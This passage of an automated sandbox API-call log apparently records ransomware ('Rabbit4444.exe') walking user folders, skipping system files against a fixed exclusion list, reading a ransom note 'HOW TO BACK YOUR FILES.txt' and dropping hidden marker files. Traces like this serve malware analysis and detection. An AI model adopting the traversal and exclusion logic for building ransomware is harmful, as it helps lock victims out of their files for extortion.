lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0065.340] lstrcpyW (in: lpString1=0x130ebde, lpString2="AC" | out: lpString1="AC") returned="AC" [0065.340] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0065.340] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x1245e8 [0065.340] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x11cfe8 [0065.340] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7266a59f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0065.340] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0065.340] lstrcpyW (in: lpString1=0x130ebde, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0065.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0065.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122780 [0065.341] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122248 [0065.341] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7266a59f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0065.341] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0065.341] lstrcpyW (in: lpString1=0x130ebde, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0065.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0065.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xefb28 [0065.341] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122268 [0065.341] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x72644337, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x72644337, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0065.341] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0065.342] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0065.342] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0065.342] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0065.342] lstrcpyW (in: lpString1=0x130ebde, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0065.342] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0065.342] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x11de60 [0065.342] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x1222e8 [0065.342] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x72644337, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x72644337, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0065.342] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0065.342] lstrcpyW (in: lpString1=0x130ebde, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0065.342] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0065.342] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x11df28 [0065.342] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x1222a8 [0065.342] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7266a59f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0065.342] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0065.343] lstrcpyW (in: lpString1=0x130ebde, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0065.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0065.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123140 [0065.343] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122068 [0065.343] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7266a59f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0065.343] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0065.343] lstrcpyW (in: lpString1=0x130ebde, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0065.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0065.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116ba0 [0065.343] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122288 [0065.343] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1028226, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x72644337, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0065.343] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0065.343] lstrcpyW (in: lpString1=0x130ebde, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0065.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0065.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11dff0 [0065.344] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122008 [0065.344] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1028226, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x72644337, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0065.344] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0065.344] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.345] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.345] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.345] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.345] CloseHandle (hObject=0x2cc) returned 1 [0065.345] CloseHandle (hObject=0x2a0) returned 1 [0065.345] GetCurrentThreadId () returned 0xd98 [0065.345] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0065.345] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState" [0065.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dff0 | out: hHeap=0xe0000) returned 1 [0065.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0065.345] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState" [0065.345] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\" [0065.346] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0065.346] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.348] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.350] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.351] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.351] CloseHandle (hObject=0x2a0) returned 1 [0065.351] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState") returned 92 [0065.351] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.351] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1028226, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0463d2b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.351] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.351] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.351] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.351] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.351] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1028226, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0463d2b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.351] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.352] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.352] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.352] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.352] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.352] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0463d2b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0463d2b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0463d2b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.352] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.352] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.352] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0463d2b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0463d2b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0463d2b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.352] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.352] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.352] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.352] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.352] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.353] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.353] CloseHandle (hObject=0x2cc) returned 1 [0065.353] CloseHandle (hObject=0x2a0) returned 1 [0065.353] GetCurrentThreadId () returned 0xd98 [0065.353] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0065.353] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData" [0065.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0065.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0065.353] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData" [0065.353] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\" [0065.353] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0065.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.355] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.357] FlushFileBuffers (hFile=0x2a0) returned 1 